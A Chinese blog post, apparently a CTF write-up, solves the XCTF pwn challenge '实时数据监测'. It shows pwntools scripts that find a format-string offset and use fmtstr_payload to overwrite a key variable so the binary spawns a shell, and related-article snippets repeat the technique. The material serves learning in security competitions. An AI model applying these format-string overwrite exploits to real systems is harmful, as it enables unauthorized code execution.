攻防世界xctf-实时数据监测 wp

最新推荐文章于 2022-06-22 16:25:32 发布
最新推荐文章于 2022-06-22 16:25:32 发布
阅读量1.3k 收藏 2
点赞数 2
分类专栏: pwn学习 文章标签: 攻防世界 xctf 格式化字符串 实时数据监测
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Casuall/article/details/108002042
版权

本题是一个简单的格式化字符串漏洞的利用。先查看一些文件的信息,32位的程序,保护措施没有开。
在这里插入图片描述
用IDA查看一些伪代码,发现main函数里面只有一个locker函数,locker函数首先接受了一个字符串s,然后调用imagemagic函数,这个函数跟进去查看其实就是一个printf函数,最后比较key的值是不是为0x2223322,如果相等,返回shell,否则打印key的地址和值
在这里插入图片描述
我们在本地运行一下看看,由于直接把key的地址告诉你了,所以本题的思路是找到格式化字符串地址的偏移,然后覆盖key的值。格式化字符串漏洞不清楚的可以先去查查相关资料,或者参考这篇文章
在这里插入图片描述
首先找偏移, printf("%p",a) 用地址的格式打印变量 a 的值。我们在前面输入AAAA,所以只需要在返回结果中找到0x41414141即可确定偏移,得到偏移为12
在这里插入图片描述
也可以用脚本得到偏移,结果是一样的

from pwn import *

conn = process('./a.out')

i = 0
while(1):
    conn.sendline('AAAA' + '%p ' * i)
    recv = conn.recv()
    if '0x41414141' in recv:
        log.info("offset is {}".format(i))
        break
    i += 1
    conn = process('./a.out')

找到偏移以后,key的地址我们也得到了,需要改写的值也知道了,可以直接用pwntools里面函数得到payload。
脚步如下

from pwn import *

debug = False

if debug:
    conn = process('./a.out')
else:
    conn = remote('220.249.52.133', 40638)

key_addr = 0x0804a048
key_value = 0x2223322

payload = fmtstr_payload(12, {key_addr: key_value})
conn.sendline(payload)

conn.interactive()
Casuall
关注
专栏目录
【网络安全 | XCTF攻防世界 ics-05 解题详析
等风来
05-31 4038
题目描述:其他破坏者会利用工控云管理系统设备维护中心的后门入侵系统。在当前目录及其子目录中查找文件名中包含 xx 的文件,如。构造Payload如下,实现将sub中的。根据提示,进入维护中心页面。查看源代码 发现注入点。
实时数据监测(xctf)
weixin_43868725的博客
05-24 915
0x0 程序保护和流程 保护: 流程: main() locker() imagemagic() 当key=35795746=0x2223322时调用system("/bin/sh"),在imagemagic()中又存在格式化字符串漏洞。所以只需要更改key的值即可。 0x1 利用过程 先确定偏移量。 偏移量为12。但是我们要向key的地址写入35795746=0x2223322,如果一次性写入35795746个字符的话输入缓冲区可能会溢出导致程序无法运行。所以我们选择单字符写入所以payloa
攻防世界 Pwn 实时数据监测
MrTreebook的博客
12-12 603
攻防世界 Pwn 实时数据监测1.题目下载地址2.checksec3.IDA4.格式化字符串漏洞的解法5.exp 1.题目下载地址 点击下载 2.checksec 什么保护都没开,估计是很简单的题 进IDA分析一下 3.IDA int locker() { int result; // eax char s[520]; // [esp+0h] [ebp-208h] BYREF fgets(s, 512, stdin); imagemagic(s); if ( key == 35795
攻防世界高手进阶区 ——实时数据检测
weixin_62675330的博客
02-13 1228
攻防世界高手进阶区 ——实时数据检测 1.分析文件 先checksec一下 发现啥都没有开,完全就是裸奔。 运行一下[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传 运行发现就是想要把key的值改为0x2223322。 直接上ida int locker() { char s[520]; // [esp+0h] [ebp-208h] BYREF fgets(s, 512, stdin); imagemagic(s);
[攻防世界]实时数据监测
逆向萌新的博客
06-22 291
[攻防世界]实时数据监测
攻防世界 pwn--实时数据检测
YANG12345_6的博客
11-30 316
32位程序 保护都没有开 直接拖进ida分析 int locker() { int result; // eax char s[520]; // [esp+0h] [ebp-208h] BYREF fgets(s, 512, stdin); imagemagic(s); // 含printf函数,有格式化字符串漏洞 if ( key == 0x2223322 ) // key在bs
攻防世界XCTF-密码破译入门12题解题报告
m0_70534726的博客
05-14 498
听说你想学习破译密码(crypto)?这可是CTF中最冷门的鸭,你可真是个奇怪的人。还不如学习WEB安全,快去渗透它吧,给个好评哟~如果你坚持要搞crypto,那就来挑战12道新手密码题吧。相信我,你会转去做WEB安全的。如果你硬着皮头,搞到底,你会发现你是没朋友滴,嘿嘿,渗透大法好~ WEB安全攻防入门 作者 ailx10 会员专享¥9.99 去查看​ 攻防世界XCFT刷题信息汇总如下:攻防世界XCTF黑客笔记刷题记录,收藏一下哈~ ailx10 969次咨询 4.9 网络安..
XCTF-攻防世界-密码学crypto-新手练习区-writeup
热门推荐
Ryannn_的博客
10-23 1万+
目录 0x00 base64 0x01 Caesar 0x02 Morse 0x03 Railfence 0x04 转轮机加密 0x05 easy_RSA 0x06 Normal_RSA 0x07 不仅仅是Morse 0x08 混合编码 0x09 easychallenge 0x0A easy_ECC 0x0B 幂数加密 0x00 base64 元宵节灯谜是一种古老的传...
XCTF攻防世界--cr3-what-is-this-encryption
qq_46927150的博客
05-03 3145
cr3-what-is-this-encryption 题目来源: alexctf-2017 看到题目中的p,q,e,就想到了RSA加密 大致思路: 先把p,q,e转成十进制,再根据公式求出n,d,m n=p*q φ(N) = (p-1)(q-1) e * d % φ(N) = 1(d是私钥,e是公钥) m=c^ d mod n (m是明文) 借鉴大佬的代码: import libnum fro...
XCTF-RE】新手练习区-open-source.c
08-03
题目:https://adworld.xctf.org.cn/task/task_list?type=reverse&number=4&grade=0&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/zgwso7
[攻防世界 pwn]——实时数据监测
Y_peak的博客
02-27 648
[攻防世界 pwn]——实时数据监测 题目地址:https://adworld.xctf.org.cn/ 题目: checksec就不说了,没什么 ida中 只要将key里面的值修改为35795746,就好 写个小脚本在pwndbg中看看偏移 from pwn import * p = process('./pwn') gdb.attach(p, 'b *0x080484A7') #p = remote("111.200.241.244",48715) key_addr = 0x0804A048 p
攻防世界:PWN刷题-实时数据监测
m0_53932372的博客
12-30 1486
实时数据监测 思路:程序是裸奔的。 漏洞是格式字符串,利用这个漏洞修改key的值,就可以了。 学会的新知识:本来想大数字覆盖一个一个来,但其实pwntools的fmtstr_payload模块就可以了。 fmtstr_payload(offset,{address:value}) exp: #!/usr/bin/python from pwn import * fmt_addr=0x0804A048 p = remote("111.200.241.244",49656) payload=fmtstr_pa
xctf 实时数据监测
Tw0的博客
10-14 1763
练习记录 一道简单的格式化字符串漏洞题目,题目所有的保护都没有开。easy,但是还是花了我好久来复习,毕竟时间长了,格式化字符串的学习都快忘记了。 总结: 1、用gdb来查看的偏移地址中,左边的是低地址的内容,右边是高地址的内容。 再后面的22就是0x804a048地址中的内容,而02就是0x804a04b地址中的内容了。 2、ida中反汇编出来的数值和gdb中看到的是一样的。都是小端序排列的数据。 3、存入地址中是以十六进制存储的,所以22代表前面输出过34个字节的数据了...
攻防世界-pwn-实时数据监测
xxxsdd的博客
02-22 1125
1.ida查看代码 2.查看保护机制 什么都没有开 3.知识点 格式化字符串漏洞 例子 printf("aa%16$n") 32位程序时 会向栈地址为esp+15中的地址addr所指向的内存单元写入2 因为aa表示了两个字节所以向[addr]中 写入2 若想写入15 则可以利用 printf("a*15%16$n") or printf("15x%16$n") 来向栈地址为esp+15中的地...
攻防世界-进阶区-实时数据监测
CHAWUCIREN1的博客
12-01 2951
将35795746换成十六进制0x2223322(按H) 根据函数,只需要令key等于0x2223322即可getshell 查看一下 imagemagic()函数 存在格式化字符串漏洞 具体看wiki:https://ctf-wiki.org/pwn/linux/user-mode/fmtstr/fmtstr-intro/ 了解到一个骚操作 fmtstr_payload(offset, writes, numbwritten=0, write_size='byte') 第一个参数表示格式化字符串...
[XCTF-pwn] 4-实时数据监测
weixin_52640415的博客
03-03 221
格式化字符串漏洞,在指定位置写入指定值 from pwn import * p = remote('111.200.241.244', 59708) context(arch='i386', log_level='debug') p.sendline(fmtstr_payload(12, {0x0804A048 : 35795746})) p.interactive()
攻防世界pwn supermarket + 实时数据监测
PLpa的博客
02-13 964
supermarket 这是一个典型的堆题,菜单类型。 只开了NX保护的32位程序。 我们来分析一下程序 程序实现了增删改查,其中改可以改价格和商品的描述,我们重点看改描述,因为程序的漏洞就在这里。 首先让我们输入商品的名字,通过名字来找到商品,这里我们就可以伪造商品了。继续往下看会看到程序让我们输入描述信息的size。通过程序分析我们知道(&s2)[v1]+5是结构体中存储堆的si...
ADworld pwn wp - 实时数据监测
fa1c4的blog
06-28 191
格式化漏洞, 可以考虑任意地址读写, 将key修改为35795746, get shell 格式化字符串的第12个参数开始泄露, 并且key的位置是0x0804a048, 所以可以将该位置写为35795746 == 0x02223322, 按双字节写入 0x0222 = 546 0x3322 = 13090 546 - 8 = 538 13090 - 546 = 12544 payload = p32(key_addr + 2) + p32(key_addr) + b"%538c%12$hn" + ...
xctf-pwn-“反应釜开关控制 & 实时数据监测 & greeting-150“
njh18790816639的博客
07-31 369
反应釜开关控制 该pwn题目逻辑较为简单。 通过三次栈溢出,可以得到shell函数地址。 发现PIE保护没有开启,其实这里是直接可以栈溢出到shell函数的地址的,不必弄那么复杂! 这道题目的PIE应该是忘记开了,题目原本设计的目的是想让我们使用三次栈溢出来得到shell的。 分界线 这里我感觉应该不是这么简单的,所以我又去进行寻找资料,发现是XCTF 4th-CyberEarth里面的盲打题。意味着我们没有ELF文件,所以我们就没有办法来想这么简单的去做出来。 实时数据监测 发现什么保护都没有
XCTF-Mobile新手练习区-08-app3解题记录与分析
资源摘要信息:"【XCTF-Mobile】新手练习区-08-app3" 知识点一:CTF竞赛介绍 CTF(Capture The Flag)中文意为“夺旗赛”,是一种网络安全竞赛。参与者需要通过各种方式攻破主办方设置的关卡,夺取出题者事先设置好...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值